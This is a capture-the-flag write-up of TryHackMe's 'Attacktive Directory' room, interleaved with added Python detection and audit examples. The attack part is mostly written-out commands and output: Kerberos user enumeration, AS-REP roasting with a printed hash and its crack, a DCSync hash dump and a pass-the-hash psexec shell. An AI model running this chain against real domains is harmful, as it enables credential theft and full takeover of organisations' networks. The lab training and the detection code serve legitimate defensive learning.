THM: Attacktive Directory

Hacktivities, published in InfoSec Write-ups, Apr 10, 2022 (9 min read)

In this article, I step through the process of exploiting a domain controller by enumerating services running on open ports, abusing Kerberos features, and elevating my privileges on the domain controller to gather all the challenge flags. This challenge is available on the TryHackMe platform and is titled “Attacktive Directory”, created by the user “spooky”.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!

What is Active Directory?

Active Directory is a directory service developed by Microsoft to manage Windows domain networks. It stores information about objects such as computers, users and printers, which makes it easier for administrators and users to find and use that information. An Active Directory domain has one or more servers called domain controllers. A domain controller provides authentication and authorization services, replicates updates to the other domain controllers in the domain or forest, and provides administrative access for managing user accounts and network resources.

Port Service Enumeration

I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.

nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report 10.10.253.179
PORT      STATE SERVICE        REASON
53/tcp open domain syn-ack ttl 125
80/tcp open http syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
389/tcp open ldap syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
464/tcp open kpasswd5 syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49664/tcp open unknown syn-ack ttl 125
49665/tcp open unknown syn-ack ttl 125
49666/tcp open unknown syn-ack ttl 125
49669/tcp open unknown syn-ack ttl 125
49672/tcp open unknown syn-ack ttl 125
49673/tcp open unknown syn-ack ttl 125
49674/tcp open unknown syn-ack ttl 125
49678/tcp open unknown syn-ack ttl 125
49684/tcp open unknown syn-ack ttl 125
49695/tcp open unknown syn-ack ttl 125

Reviewing the output, I can see that there are twenty-four ports open. I next used NMAP to identify the services running on each port and ran the default NSE scripts (-sC) to find any common vulnerabilities that I could exploit.

nmap -sV -sC -Pn -v -oN nmap-report -p 53,80,88,135,139,389,445,464,593,636,3389,5985,9389,47001,49664,49665,49666,49669,49672,49673,49674,49678,49684,49695 10.10.253.179
PORT      STATE SERVICE       VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-20 15:08:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-20T15:10:30+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-03-19T14:57:07
| Not valid after: 2022-09-18T14:57:07
| MD5: 98b7 aa02 99ce 8fac 662f 00bb 1c1f 2924
|_SHA-1: 6c83 7335 c65a 610b 4477 d012 08b9 2223 aed5 ebd0
|_ssl-date: 2022-03-20T15:10:46+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC

I can see some interesting services identified by NMAP running on the open ports that we can further enumerate.

SMB Enumeration

I can see that ports 139 and 445 are open. Port 139 carries SMB over the NetBIOS session service and port 445 carries SMB directly over TCP; both are used for authentication and file sharing. There are multiple tools available to enumerate ports 139/445. We can start by using enum4linux to find information about shares on the target.

# -a: does all simple enumeration (-U -S -G -P -r -o -n -i).
$ enum4linux -a 10.10.201.126
============================================
| Getting domain SID for 10.10.201.126 |
============================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

This provides us with some useful information, such as the NetBIOS-Domain Name of the machine, which is the subdomain of the DNS domain name.

RDP Enumeration

Continuing to review the output from the NMAP scans performed earlier, I can see some additional Windows host and domain information being disclosed on port 3389 (RDP).

3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-03-20T15:10:30+00:00

I can also see that the domain uses the .local top-level domain (TLD). This was a common choice for Active Directory domains in the past but should now be avoided according to the Active Directory Naming FAQ.

Kerberos Enumeration & Exploitation

Kerberos is the primary authentication service within Active Directory, and the Key Distribution Center (KDC) listens on port 88. We can use the tool kerbrute to quickly enumerate valid Active Directory accounts: the KDC answers a Kerberos pre-authentication request differently for a username that exists and one that does not, so no password is needed to tell the two apart.

./kerbrute_linux_amd64 userenum --dc 10.10.253.179 -d spookysec.local -o kerbrute-user-enum userlist
2022/03/20 15:34:28 >  Using KDC(s):
2022/03/20 15:34:28 > 10.10.253.179:88
2022/03/20 15:34:29 > [+] VALID USERNAME: james@spookysec.local
2022/03/20 15:34:35 > [+] VALID USERNAME: svc-admin@spookysec.local
2022/03/20 15:34:44 > [+] VALID USERNAME: James@spookysec.local
2022/03/20 15:34:47 > [+] VALID USERNAME: robin@spookysec.local
2022/03/20 15:35:14 > [+] VALID USERNAME: darkstar@spookysec.local
2022/03/20 15:35:37 > [+] VALID USERNAME: administrator@spookysec.local
2022/03/20 15:36:11 > [+] VALID USERNAME: backup@spookysec.local
2022/03/20 15:36:32 > [+] VALID USERNAME: paradox@spookysec.local
2022/03/20 15:39:16 > [+] VALID USERNAME: Robin@spookysec.local
2022/03/20 15:43:20 > [+] VALID USERNAME: Administrator@spookysec.local
2022/03/20 15:51:29 > [+] VALID USERNAME: Darkstar@spookysec.local
2022/03/20 15:54:07 > [+] VALID USERNAME: Paradox@spookysec.local
2022/03/20 16:02:39 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2022/03/20 16:04:59 > [+] VALID USERNAME: ori@spookysec.local
2022/03/20 16:11:05 > [+] VALID USERNAME: ROBIN@spookysec.local
2022/03/20 16:25:53 > Done! Tested 73317 usernames (16 valid) in 3084.883 seconds

We can see that 16 accounts are reported (several of them are case variants of the same name, since Kerberos principal lookups are case-insensitive), including a service admin account (i.e. svc-admin) and a backup account, which are of particular interest. Using the newly discovered list of accounts, we can attempt to abuse a feature within Kerberos with an attack method called AS-REP Roasting.

AS-REP Roasting is possible when a user account has the “Does not require Kerberos preauthentication” flag set. This means the KDC will hand out an AS-REP for that account without the requester first proving knowledge of the password. Part of that AS-REP is encrypted with a key derived from the user's password, so it can be taken offline and cracked.

We can request those AS-REP messages with the tool “GetNPUsers.py” from Impacket, which queries the Key Distribution Center for AS-REP roastable accounts. The only input it needs is a list of valid usernames, which we enumerated previously via kerbrute.
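The flag described above is a bit in each account's userAccountControl attribute (DONT_REQ_PREAUTH, 0x400000). The following is an added example, not code from the writeup or from any of the tools it uses: it audits an export of that attribute and reports every account that is AS-REP roastable. The LDIF-style sample, the account names and their attribute values are constructed for the example and are not taken from the challenge machine.

```python
# Added example (not part of the original writeup): audit a userAccountControl
# export for the "Do not require Kerberos preauthentication" bit (DONT_REQ_PREAUTH,
# 0x400000), the setting that makes an account AS-REP roastable.
# The LDIF-style sample below is constructed for this example; the values are not
# taken from the challenge machine.

UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}
DONT_REQ_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x000002

SAMPLE_LDIF = """\
dn: CN=svc-admin,CN=Users,DC=spookysec,DC=local
sAMAccountName: svc-admin
userAccountControl: 4260352

dn: CN=backup,CN=Users,DC=spookysec,DC=local
sAMAccountName: backup
userAccountControl: 66048

dn: CN=olduser,CN=Users,DC=spookysec,DC=local
sAMAccountName: olduser
userAccountControl: 4260354

dn: CN=Guest,CN=Users,DC=spookysec,DC=local
sAMAccountName: Guest
userAccountControl: 66082
"""


def parse_ldif(text):
    """Parse the minimal LDIF subset used above (one attribute per line,
    entries separated by blank lines) into a list of dicts."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(": ")
        current[key] = value
    if current:
        entries.append(current)
    return entries


def decode_uac(value):
    """Return the names of the known userAccountControl bits set in value."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def find_asrep_roastable(text):
    """One finding per account with DONT_REQ_PREAUTH set. Disabled accounts are
    still reported, at lower severity: the bit should be cleared anyway so the
    weakness does not return when the account is re-enabled."""
    findings = []
    for entry in parse_ldif(text):
        uac = int(entry["userAccountControl"])
        if not uac & DONT_REQ_PREAUTH:
            continue
        findings.append({
            "account": entry["sAMAccountName"],
            "flags": decode_uac(uac),
            "severity": "low" if uac & ACCOUNTDISABLE else "high",
        })
    return findings


if __name__ == "__main__":
    for f in find_asrep_roastable(SAMPLE_LDIF):
        print(f"{f['severity']:4} {f['account']:10} {' | '.join(f['flags'])}")
```

Against a live domain the same check is the LDAP bitwise-AND filter `(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))` (4194304 is 0x400000 in decimal); clearing the bit on every account that does not have a documented need for it removes the condition the rest of this section exploits.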

python3 GetNPUsers.py spookysec.local/ -dc-ip 10.10.253.179 -usersfile kerberos-usernames -no-pass -request -outputfile kerberos-users-found

After running “GetNPUsers.py”, I can see that the KDC returns an AS-REP for the svc-admin account without a password being supplied.

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c

Next, we can use Hashcat to crack the “Kerberos 5 AS-REP etype 23” hash retrieved from the KDC.

hashcat64.exe -m 18200 -a 0 hash.txt rockyou.txt -o cracked.txt
<hash>:mana**********

This provides us with a set of credentials that we can now use to enumerate any shares that the domain controller may be exposing.
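Both steps of this section leave a trail in the domain controller's Security log as event 4768 (a Kerberos TGT was requested). The following is an added example, not code from the writeup or from kerbrute, Impacket or hashcat: it runs two detections over constructed 4768 records, a burst of "client principal unknown" (result code 0x6) answers to one source, which is what the kerbrute enumeration above looks like from the KDC's side, and a TGT issued with pre-authentication type 0 and RC4 (etype 0x17), which is what the GetNPUsers.py request looks like. The event values, source addresses and thresholds are constructed and assumed for the example.

```python
# Added example (not part of the original writeup): two detections over Windows
# Security event 4768 ("A Kerberos authentication ticket (TGT) was requested").
# The events below are constructed for this example and are not from the
# challenge machine; field names follow the 4768 event schema.
from collections import defaultdict
from datetime import datetime


def ev(time, user, ip, status, preauth, etype):
    return {"time": time, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


SAMPLE_4768 = [
    # username enumeration: many "client principal unknown" (0x6) answers to one source
    ev("2022-03-20T15:34:28", "aaron",     "10.10.14.5",  "0x6", "-", "0xffffffff"),
    ev("2022-03-20T15:34:29", "abigail",   "10.10.14.5",  "0x6", "-", "0xffffffff"),
    ev("2022-03-20T15:34:30", "adam",      "10.10.14.5",  "0x6", "-", "0xffffffff"),
    ev("2022-03-20T15:34:31", "adrian",    "10.10.14.5",  "0x6", "-", "0xffffffff"),
    ev("2022-03-20T15:34:33", "alan",      "10.10.14.5",  "0x6", "-", "0xffffffff"),
    ev("2022-03-20T15:34:35", "albert",    "10.10.14.5",  "0x6", "-", "0xffffffff"),
    # normal logon: pre-auth type 2 (encrypted timestamp), AES256 etype
    ev("2022-03-20T15:40:00", "robin",     "10.10.10.20", "0x0", "2", "0x12"),
    # a single typo from a normal host is not enumeration
    ev("2022-03-20T15:41:10", "robni",     "10.10.10.20", "0x6", "-", "0xffffffff"),
    # AS-REP roast: TGT issued with no pre-authentication (type 0) and RC4 (0x17)
    ev("2022-03-20T15:55:02", "svc-admin", "10.10.14.5",  "0x0", "0", "0x17"),
]


def detect_user_enumeration(events, threshold=5, window_seconds=60):
    """Return {source_ip: count} for sources that received at least `threshold`
    KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) answers inside any `window_seconds` span.
    Only the guesses for non-existent names leave a 0x6 record, which is why
    the count is the signal rather than any single event."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"].lower() == "0x6":
            by_ip[e["IpAddress"]].append(datetime.fromisoformat(e["time"]))
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):            # sliding window over sorted times
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), end - start + 1)
    return flagged


def detect_asrep_roast(events):
    """Return (source_ip, account) for every TGT that was issued (0x0) with no
    pre-authentication (type 0) and the RC4-HMAC etype (0x17), the combination
    a GetNPUsers.py request produces."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["Status"].lower() == "0x0"
            and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"].lower() == "0x17"]


if __name__ == "__main__":
    print("enumeration sources:", detect_user_enumeration(SAMPLE_4768))
    print("AS-REP roast requests:", detect_asrep_roast(SAMPLE_4768))
```

The threshold and window are starting points to tune against your own baseline of failed logons; the AS-REP rule is worth keeping even on a domain with no pre-auth-exempt accounts, since a hit then means the flag was set without anyone noticing.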

SMB Enumeration (Cont.)

Using the svc-admin credentials, I can now further enumerate the shares on the DC. I can use the tool smbclient to list the shares on the DC.

smbclient -L //10.10.200.95 -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share

I can see six shares being listed by the server, including a share called backup. This share contains a text file called “backup_credentials.txt”, which contains base64-encoded text. Decoding this text provides credentials for the backup user account.

CyberChef Base64 Decoded Credentials.

Domain Privilege Escalation

According to the challenge description, the backup account has a unique permission that allows all Active Directory changes to be synced with this user account, including password hashes. We can use a tool called “secretsdump.py” within Impacket to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer.

python3 secretsdump.py spookysec.local/backup:'backup2517860'@10.10.25.158 -just-dc

“secretsdump.py” uses the DRSUAPI method to get the NTDS.DIT secrets: it speaks the same directory replication RPC interface that domain controllers use to sync with each other, which is why this technique is commonly known as DCSync.

The NTDS.dit file is the database that stores Active Directory data, including information about user objects, groups and group membership. Importantly, the file also stores the password hashes for all users in the domain.

The tool dumps the NTLM hashes of every account in the domain:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
.....etc.....
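A replication request like the one secretsdump.py makes is recorded on the domain controller as Security event 4662 with the replication control-access rights listed in the Properties field. The following is an added example, not code from the writeup or from Impacket: it flags any principal other than a known replicator that exercises those rights. The event records are constructed for the example, and the allow-list of legitimate replicators (here just the DC's own computer account, taken from the RDP fingerprint above) is an assumption the defender has to maintain.

```python
# Added example (not part of the original writeup): detect DCSync-style
# replication from Windows Security event 4662 ("An operation was performed on
# an object"). The events are constructed; KNOWN_REPLICATORS is an assumption.
import re

# Control-access-right GUIDs from the Active Directory schema that grant replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for extended (control access) rights
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Assumption: the defender keeps the list of principals allowed to replicate
# (domain controller computer accounts, directory-sync service accounts, ...).
KNOWN_REPLICATORS = {"ATTACKTIVEDIREC$"}


def ev(subject, domain, mask, *guids):
    """Build a constructed 4662 record; Properties holds one GUID per line as
    the Windows event does."""
    return {"SubjectUserName": subject, "SubjectDomainName": domain,
            "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",   # domainDNS class
            "AccessMask": mask,
            "Properties": "Control Access\n\t{" + "}\n\t{".join(guids) + "}"}


SAMPLE_4662 = [
    # the DC's own computer account replicating: expected
    ev("ATTACKTIVEDIREC$", "THM-AD", "0x100",
       "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2"),
    # a user account pulling all changes including secrets: DCSync
    ev("backup", "THM-AD", "0x100",
       "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2"),
    # ordinary attribute read with an unrelated property GUID (constructed sample)
    ev("robin", "THM-AD", "0x10", "bf967a86-0de6-11d0-a285-00aa003049e2"),
]


def detect_dcsync(events, known=KNOWN_REPLICATORS):
    """Return one finding per 4662 event in which a principal outside `known`
    exercised a replication right on the domain object."""
    allow = {k.upper() for k in known}
    findings = []
    for e in events:
        if not int(e["AccessMask"], 16) & CONTROL_ACCESS:
            continue
        rights = [REPLICATION_RIGHTS[g.lower()]
                  for g in GUID_RE.findall(e["Properties"])
                  if g.lower() in REPLICATION_RIGHTS]
        if not rights or e["SubjectUserName"].upper() in allow:
            continue
        findings.append({"account": f"{e['SubjectDomainName']}\\{e['SubjectUserName']}",
                         "rights": rights})
    return findings


if __name__ == "__main__":
    for f in detect_dcsync(SAMPLE_4662):
        print(f"{f['account']} replicated with {', '.join(f['rights'])}")
```

The preventive side is the same list of GUIDs: whoever holds these rights on the domain head in the ACL can do what the backup account does here, so that ACL is worth reviewing as often as the membership of Domain Admins.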

Pass The Hash (PtH) Attack

An attack method that could allow us to authenticate as the user without the password is the Pass The Hash attack.

Pass the Hash is a technique whereby an attacker captures a password hash (as opposed to the password characters) and simply passes it through for authentication, and potentially for lateral access to other networked systems. It works because NTLM authentication proves knowledge of the NT hash rather than of the password itself, so the hash alone is enough to authenticate.

There are multiple tools that can be used to perform a pass the hash attack, including Evil-WinRM, crackmapexec, and psexec.py. I had difficulty getting Evil-WinRM to work but was able to use psexec.py to get a shell with the Administrator NTLM hash.

python3 psexec.py Administrator@10.10.25.158 -hashes aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.200.95.....
[*] Found writable share ADMIN$
[*] Uploading file eanlOsfQ.exe
[*] Opening SVCManager on 10.10.200.95.....
[*] Creating service GzYy on 10.10.200.95.....
[*] Starting service GzYy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

From here, I effectively have full control over the AD Domain and can retrieve all three flags.
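The psexec.py run above leaves two artefacts on the target that are worth correlating: a Security event 4624 for a network logon (type 3) authenticated with NTLM rather than Kerberos, which is exactly what a pass-the-hash logon looks like, and a System event 7045 for a newly installed service with a random name and a random binary dropped into the ADMIN$ share. The following is an added example, not code from the writeup or from Impacket, that pairs the two. The events are constructed for the example; the service and file names mirror the psexec.py output quoted above, the source address, workstation name and time window are assumptions, and the "random-looking service" test is a heuristic to be tuned against your own baseline.

```python
# Added example (not part of the original writeup): correlate the NTLM network
# logon (4624) and the random service install (7045) that a pass-the-hash +
# psexec.py run leaves on the target. All events are constructed; PRIVILEGED
# and the window are assumptions for the example.
import re
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    {"time": "2022-03-20T16:40:01", "id": 4624, "LogonType": "3",
     "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2",
     "TargetUserName": "Administrator", "IpAddress": "10.10.14.5",
     "WorkstationName": "KALI"},
    {"time": "2022-03-20T16:40:03", "id": 7045, "ServiceName": "GzYy",
     "ImagePath": "%systemroot%\\eanlOsfQ.exe", "AccountName": "LocalSystem"},
    {"time": "2022-03-20T16:45:00", "id": 4624, "LogonType": "3",
     "AuthenticationPackageName": "Kerberos", "LmPackageName": "-",
     "TargetUserName": "robin", "IpAddress": "10.10.10.20",
     "WorkstationName": "-"},
    {"time": "2022-03-20T16:50:00", "id": 7045, "ServiceName": "CustomBackup",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k netsvcs",
     "AccountName": "LocalSystem"},
]

PRIVILEGED = {"Administrator"}           # assumption: defender-maintained list
RANDOM_EXE = re.compile(r"^[A-Za-z]{4,10}\.exe$")


def _mixed_case(s):
    return any(c.islower() for c in s) and any(c.isupper() for c in s)


def looks_random_service(event):
    """Heuristic for a psexec-style service: a short letters-only mixed-case
    binary name dropped directly under the system root (ADMIN$), registered
    under a mixed-case service name."""
    path = event["ImagePath"].split()[0].replace("\\", "/")
    parent, _, base = path.rpartition("/")
    return (bool(RANDOM_EXE.match(base))
            and _mixed_case(base[:-4])
            and parent.lower() in ("%systemroot%", "c:/windows")
            and _mixed_case(event["ServiceName"]))


def ntlm_network_logons(events, privileged=PRIVILEGED):
    """4624 events where a privileged account logged on over the network
    (type 3) with NTLM instead of Kerberos. On its own this is only a weak
    signal, since a password logon over NTLM looks identical."""
    return [e for e in events
            if e["id"] == 4624 and e["LogonType"] == "3"
            and e["AuthenticationPackageName"] == "NTLM"
            and e["TargetUserName"] in privileged]


def correlate_pth_psexec(events, window=timedelta(seconds=120)):
    """Pair each suspicious NTLM logon with a random-looking service install
    that follows it within `window`; the pair is the psexec.py footprint."""
    findings = []
    for logon in ntlm_network_logons(events):
        t0 = datetime.fromisoformat(logon["time"])
        for svc in events:
            if svc["id"] != 7045 or not looks_random_service(svc):
                continue
            delta = datetime.fromisoformat(svc["time"]) - t0
            if timedelta(0) <= delta <= window:
                findings.append({"source_ip": logon["IpAddress"],
                                 "workstation": logon["WorkstationName"],
                                 "account": logon["TargetUserName"],
                                 "service": svc["ServiceName"],
                                 "image": svc["ImagePath"]})
    return findings


if __name__ == "__main__":
    for f in correlate_pth_psexec(SAMPLE_EVENTS):
        print(f"{f['account']} from {f['source_ip']} ({f['workstation']}) "
              f"installed service {f['service']} -> {f['image']}")
```

Because an NTLM logon with the hash is indistinguishable from one with the password, the durable fix is to stop NTLM from being useful for this account class at all: restrict where privileged accounts may log on, and treat any NTLM network logon of such an account from a machine that is not domain-joined as the alert even when no service install follows.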

User Flag.
Privilege Escalation Flag.
Root Flag.

Final Thoughts

I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. Thank you for reading till the end and keep hacking 😄!
